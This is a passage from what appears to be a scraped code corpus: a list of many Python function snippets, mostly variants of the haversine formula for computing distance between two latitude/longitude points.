lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n return (km * 1000)", "def haversine(lon1, lat1, lon2, lat2):\n\t# convert decimal degrees to radians \n\tlon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\t# haversine formula \n\tdlon = lon2 - lon1 \n\tdlat = lat2 - lat1 \n\ta = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\tc = 2 * asin(sqrt(a)) \n\tkm = 6367 * c\n\n\n\treturn km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n km = 6371* c\n return km", "def nphaversine(point1, point2, miles=False):\n\n# print point1\n# print point2 \n \n # unpack latitude/longitude\n if len(point1.shape) == 1:\n point1 = np.array([point1])\n if len(point2.shape) == 1:\n point2 = np.array([point2])\n \n# print point1\n# print point2 \n point1 = np.radians(point1)\n point2 = np.radians(point2)\n \n \n\n # convert all latitudes/longitudes from decimal degrees to radians\n# lat1, lng1, lat2, lng2 = map(np.radians, (lat1, lng1, lat2, lng2))\n\n # calculate haversine\n d = np.power(np.sin((point2[:,0] - point1[:,0]) / 2) , 2) + np.cos(point1[:,0]) * np.cos(point2[:,0]) * np.power(np.sin((point2[:,1] - point1[:,1]) / 2), 2)\n h = 2 * AVG_EARTH_RADIUS * np.arcsin(np.sqrt(d))\n if miles:\n return h * 0.621371 # in miles\n else:\n return h # in kilometers", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat/2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2)**2\n c = 2 * math.asin(np.sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def distance(lat0, lng0, lat1, lng1):\n # convert decimal degrees to radians \n lat0, lng0, lat1, lng1 = map(radians, [lat0, lng0, lat1, lng1])\n # haversine formula \n dlng = lng1 - lng0 \n dlat = lat1 - lat0 \n a = sin(dlat/2)**2 + cos(lat0) * cos(lat1) * sin(dlng/2)**2\n c = 2 * asin(sqrt(a)) \n m = 6367000 * c\n return m", "def calc_distance_two_points(lat_from, long_from, lat_to, long_to):\n distance_in_km = haversine(\n (lat_from, long_from),\n (lat_to, long_to),\n unit='km')\n\n return distance_in_km", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n\n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(self,lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km*1000", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n metres = km * 1000\n return metres", "def calc_distance_haversine(coord1, coord2):\n lat1, lon1 = coord1\n lat2, lon2 = coord2\n # approximate radius of earth in km\n R = 6373.0\n\n lat1 = radians(lat1)\n lon1 = radians(lon1)\n lat2 = radians(lat2)\n lon2 = radians(lon2)\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n\n distance = R * c\n\n return distance", "def haversine(lon1, lat1, lon2, lat2):\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371000 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine_distance(self, p1, p2):\n r = 6371000\n\n # Setting up haversine terms of distance expansion\n hav_1 = np.power(np.sin((p2[1] - p1[1]) / 2 * np.pi / 180), 2.0)\n hav_2 = np.cos(p2[1] * np.pi / 180) * np.cos(p1[1] * np.pi / 180) * np.power(\n np.sin((p2[0] - p1[0]) / 2 * np.pi / 180), 2.0)\n\n # taking the arcsine of the root of the sum of the haversine terms\n root = np.sqrt(hav_1 + hav_2)\n arc = np.arcsin(root)\n\n # return final distance between the two points\n return 2 * r * arc", "def haversine(test_point, training_locations):\n test_point = test_point.reshape(1, 2)\n difference = (test_point - training_locations) * np.pi / 180\n test_point_lat = test_point[:, 1] * np.pi / 180\n training_locations_lat = training_locations[:, 1] * np.pi / 180\n \n a = np.sin(difference[:, 0] / 2)**2 * np.cos(test_point_lat) * np.cos(training_locations_lat) +\\\n np.sin(difference[:, 1] / 2)**2 \n radius = 6371\n c = 2 * np.arcsin(np.sqrt(a))\n return radius * c", "def haversine_dist(this_lat, this_lon, lat_vec, lon_vec):\n this_lat, this_lon, lat_vec, lon_vec = map(np.radians, (this_lat, this_lon, lat_vec, lon_vec))\n dlat = lat_vec - this_lat\n dlon = lon_vec - this_lon\n a = np.square(np.sin(dlat/2)) + np.cos(this_lat) * np.multiply(np.cos(lat_vec), np.square(np.sin(dlon/2)))\n c = 2 * np.arcsin(np.sqrt(a))\n return c", "def haversine(lat1, lat2, lon1, lon2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [float(lon1), float(lat1), float(lon2), float(lat2)])\n \n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 * 1000 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\r\n # convert decimal degrees to radians \r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n\r\n # haversine formula \r\n dlon = lon2 - lon1 \r\n dlat = lat2 - lat1 \r\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\r\n c = 2 * asin(sqrt(a)) \r\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\r\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n\t# convert decimal degrees to radians \n\tlon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n\t# haversine formula\n\tdlon = lon2 - lon1 \n\tdlat = lat2 - lat1 \n\ta = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\tc = 2 * asin(sqrt(a)) \n\tr = 6371000 # Radius of earth in meters. Use 3956 for miles\n\treturn c*r", "def haversine(lon1, lat1, lon2, lat2):\n from math import radians, cos, sin, asin, sqrt\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2.)**2. + cos(lat1) * cos(lat2) * sin(dlon/2.)**2.\n c = 2. * asin(sqrt(a)) \n\n # 6378.1 km is the radius of the Earth = 6378100 m\n m = 6378100. * c\n return m", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 3956 # Radius of earth in miles. Use 6371 for kms\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n lon1 = float(lon1)\n lat1 = float(lat1)\n lon2 = float(lon2)\n lat2 = float(lat2)\n\n if lon1 == 0 or lat1 == 0:\n return float(999999999)\n\n if lon2 == 0 or lon2 ==[]:\n return float(999999999)\n\n if lat2 == 0 or lat2 ==[]:\n return float(999999999)\n\n\n # 将十进制度数转化为弧度\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine公式\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r * 1000", "def haversine(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lat1: float, lon1: float, lat2: float, lon2: float) -> float:\n lat1, lon1, lat2, lon2, = map(radians, [lat1, lon1, lat2, lon2])\n # average earth radius\n R = 6372.8\n dlat = lat2 - lat1\n dlon = lon2 - lon1\n sin_lat_squared = sin(dlat * 0.5) * sin(dlat * 0.5)\n sin_lon_squared = sin(dlon * 0.5) * sin(dlon * 0.5)\n computation = asin(sqrt(sin_lat_squared + sin_lon_squared * cos(lat1) * cos(lat2)))\n d = 2 * R * computation\n return d", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n return convert_km_to_mi(km)", "def haversine(lat1, lon1, lat2, lon2):\r\n # convert decimal degrees to radians\r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n\r\n # haversine formula\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\r\n c = 2 * asin(sqrt(a))\r\n r = 3959 # Radius of earth in miles\r\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n from math import radians, cos, sin, asin, sqrt\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n \n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 3956 # Radius of earth in MILES. Use 6371 for KM\n return round(c * r, 4)", "def haversine(latitude_1, longitude_1, latitude_2, longitude_2):\n\n radius = 2.5 # In Kilometer\n # Degree to radians\n latitude_1, longitude_1, latitude_2, longitude_2 = \\\n map(radians, [latitude_1, longitude_1, latitude_2, longitude_2])\n\n # Haversine formula\n d_latitude = latitude_2 - latitude_1\n d_longitude = longitude_2 - longitude_1\n a = sin(d_latitude / 2) ** 2 + cos(latitude_1) * cos(latitude_2) * sin(d_longitude / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers\n return c * r <= radius", "def haversine(lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 \n # 将十进制度数转化为弧度 \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2]) \n \n # haversine公式 \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2 \n c = 2 * asin(sqrt(a)) \n r = 6371 # 地球平均半径,单位为公里 \n return c * r", "def haversine(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 3956 # Radius of earth in kilometers. Use 3956 for miles\n return c * r * 1.60934", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r * 1000", "def haversine(lon1, lat1, lon2, lat2):\n\n Re = 6378.137\n\n # convert decimal degrees to radians\n deg2rad = np.pi / 180.\n lon1 = np.array(lon1) * deg2rad\n lat1 = np.array(lat1) * deg2rad\n lon2 = np.array(lon2) * deg2rad\n lat2 = np.array(lat2) * deg2rad\n\n if lon2.shape:\n N = lon2.shape[0]\n lon1 = np.repeat(lon1, N)\n lat1 = np.repeat(lat1, N)\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = np.sin(dlat / 2.)**2. + np.cos(lat1) * \\\n np.cos(lat2) * np.sin(dlon / 2.)**2.\n c = 2. * np.arcsin(np.sqrt(a))\n km = Re * c\n return km", "def haversine(lon1,lat1,lon2,lat2,yy_lon,yy_lat):\n # convert decimal to radians\n lon1b, lat1b, lon2b, lat2b = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2b-lon1b\n dlat = lat2b-lat1b\n\n a = sin(dlat/2)**2 + cos(lat1b)*cos(lat2b)*sin(dlon/2)**2\n c = 2*asin(sqrt(a))\n r = 6371. # radius of Earth in km\n\n return c*r,lat2,lon2,yy_lat,yy_lon,lat1,lon1", "def haversine_array(lon1, lat1, lon2, lat2):\n R = 6371.0 # radius of the earth in km\n\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = np.sin(dlat/2.0)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2.0)**2\n\n c = 2 * np.arcsin(np.sqrt(a))\n km = R * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n \n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n \n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 3956 #radius of earth in miles mean of poles and equator radius\n return c * r", "def haversine_distance(loc1_lat, loc1_lon, loc1_alt, loc2_lat, loc2_lon, loc2_alt):\n R = 6372797.560856 # radius of the earth in meters\n R = R + loc2_alt - loc1_alt\n\n lat_arc = math.radians(loc1_lat - loc2_lat)\n lon_arc = math.radians(loc1_lon - loc2_lon)\n\n lat_h = math.sin(lat_arc * 0.5)\n lat_h = lat_h * lat_h\n\n lon_h = math.sin(lon_arc * 0.5)\n lon_h = lon_h * lon_h\n\n tmp = math.cos(math.radians(loc1_lat)) * math.cos(math.radians(loc2_lat))\n rad = 2.0 * math.asin(math.sqrt(lat_h + tmp * lon_h))\n\n return rad * R", "def distance(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * asin(sqrt(a))\n m = 6367 * c * 1000\n return m", "def haversine(lat2, lon2):\n\n lat1 = 53.342998628\n lon1 = -6.256165642\n\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = np.sin(dlat / 2.0) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2.0) ** 2\n\n c = 2 * np.arcsin(np.sqrt(a))\n km = 6367 * c\n\n return km", "def haversine(lat1, lon1, lat2, lon2, radius=6371):\n from math import radians, sin, cos, sqrt, asin\n dLat = radians(lat2 - lat1)\n dLon = radians(lon2 - lon1)\n lat1 = radians(lat1)\n lat2 = radians(lat2)\n c = 2 * asin(sqrt(sin(dLat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dLon / 2) ** 2))\n return radius * c * 1000 # return in meters", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 3956 # Radius of earth in kilometers. Use 3956 for miles\n return c * r * 5280", "def haversine(lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n # 将十进制度数转化为弧度\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine公式\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r * 1000", "def haversine(self, lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = Decimal(lon1), Decimal(lat1), Decimal(lon2), Decimal(lat2)\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def harversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # harversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat/2.)**2. + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2.)**2.\n c = 2. * math.asin(math.sqrt(a))\n km = 6371. * c # radius of earth\n return km", "def distance(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km", "def aversine(lon1, lat1, lon2, lat2):\n\n lon1 = float(lon1)\n lon2 = float(lon2)\n lat1 = float(lat1)\n lat2 = float(lat2)\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2\n c = 2 * math.asin(math.sqrt(a))\n meters = 6356988 * c\n\n return meters", "def get_distance_from_point(long1, lati1, long2, lati2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [long1, lati1, long2, lati2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine1(self, lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n # 将十进制度数转化为弧度\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine公式\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r * 1000", "def haversine(\n lat1: float, lon1: float, lat2: float, lon2: float, *, unit: str = \"metric\"\n) -> float:\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n calc_a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n calc_c = 2 * asin(sqrt(calc_a))\n\n if unit == \"metric\":\n return AVG_EARTH_RADIUS_METRIC * calc_c\n return AVG_EARTH_RADIUS_IMPERIAL * calc_c", "def haversine(self,loc1,loc2):\n R = 6371. # Radius of earth in kilometers\n lat1 = np.radians(loc1[0])\n lat2 = np.radians(loc2[0])\n dlat = lat2 - lat1\n dlon = np.radians(loc2[1] - loc1[1])\n\n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arctan2(np.sqrt(a), np.sqrt(1-a))\n return R * c", "def haversine(origin, destination):\n lat1, lon1 = origin\n lat2, lon2 = destination\n radius = 6371000\n dlat = math.radians(lat2 - lat1)\n dlon = math.radians(lon2 - lon1)\n a = math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1)) * math.cos(\n math.radians(lat2)) * math.sin(dlon / 2) * math.sin(dlon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = radius * c\n\n return d", "def Haversine(c1, c2):\n lat1 = float(c1.split(\",\")[0])\n lon1 = float(c1.split(\",\")[1])\n lat2 = float(c2.split(\",\")[0])\n lon2 = float(c2.split(\",\")[1])\n\n\n #convert degrees into radians\n lat1, lon1, lat2, lon2 = map(radians, [lat1, lon1, lat2, lon2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 3959.87433 # Radius of earth in miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n\tdirectionDict = {'North':[0,90],'East':[90,180],'South':[180,270],'West':[270,360]}\n\tlon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n\t# haversine formula \n\tdlon = lon2 - lon1 \n\tdlat = lat2 - lat1 \n\ta = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\tc = 2 * asin(sqrt(a)) \n\tr = 6371 # Radius of earth in kilometers. Use 3956 for miles\n\n\t\"\"\"Calculate bearing (angle) between 2 coordinates\"\"\"\n\tbearing = atan2(sin(lon2-lon1)*cos(lat2), cos(lat1)*sin(lat2)-sin(lat1)*cos(lat2)*cos(lon2-lon1))\n\tbearing = degrees(bearing)\n\tbearing = (bearing + 360) % 360\n\n\tdirection = \"\"\n\tfor k,v in directionDict.iteritems():\n\t\tif bearing >= v[0] and bearing < v[1]:\n\t\t\tdirection = k\n\n\treturn c * r, bearing, direction", "def haversine(lon1, lat1, lon2, lat2, in_miles=True):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2.0)**2 + cos(lat1) * cos(lat2) * sin(dlon/2.0)**2\n c = 2.0 * asin(sqrt(a))\n R = 3956.0 if in_miles else 6371.0\n return c * R", "def haversine(coordinate_1, coordinate_2):\n lat1, lon1, lat2, lon2 = coordinate_1[0], coordinate_1[1], coordinate_2[0], coordinate_2[1]\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6373 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def dist(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def earth_haversine(p: np.ndarray, q: np.ndarray) -> float:\n earth_radius = 6378137.0\n return haversine(np.radians(p), np.radians(q)) * earth_radius", "def haversine(coord1, coord2, r_E=6371):\n\n def _to_rad(deg):\n return deg * np.pi / 180.\n \n lat1, lat2 = _to_rad(coord1[:, 0]), _to_rad(coord2[:, 0])\n dlat = _to_rad(coord1[:, 0] - coord2[:, 0])\n dlon = _to_rad(coord1[:, 1] - coord2[:, 1])\n\n a = 